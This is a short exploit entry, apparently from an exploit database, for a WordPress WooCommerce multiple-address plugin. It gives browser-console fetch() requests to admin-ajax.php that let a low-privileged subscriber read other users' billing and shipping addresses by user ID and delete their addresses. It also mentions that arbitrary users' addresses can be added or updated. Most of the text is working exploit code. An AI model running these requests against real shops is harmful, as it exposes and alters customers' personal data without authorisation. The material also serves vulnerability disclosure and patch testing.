## https://sploitus.com/exploit?id=WPEX-ID:E39C0171-ED4A-4143-9A31-C407E3555EEC
Run the below commands in the developer console of the web browser while being on the blog as subscriber user (note: the address manipulated are those added via the plugin, not WC)
To retrieve the first address of the user with ID 1750
fetch("/wp-admin/admin-ajax.php", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
},
"method": "POST",
"body": 'action=wcmca_get_address_by_id&address_id=0&user_id=1750',
"credentials": "include"
}).then(response => response.text())
.then(data => console.log(data));
Other possible values for address_id: last_used_billing, last_used_shipping, checkout_data.
To delete the address with ID 1 of the user with ID 1750 (to be executed on the Edit Address page when logged as a subscriber, e.g http://example.com/my-account/edit-address/)
fetch("/wp-admin/admin-ajax.php", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
},
"method": "POST",
"body": 'action=wcmca_delete_address&wcmca_delete_id=0&wcmca_user_id=1&wcmca_security_token=' + wcmca_address_form['security_token'],
"credentials": "include"
}).then(response => response.text())
.then(data => console.log(data));
It is also possible to add/update an address of an arbitrary user via the wcmca_save_new_address AJAX action.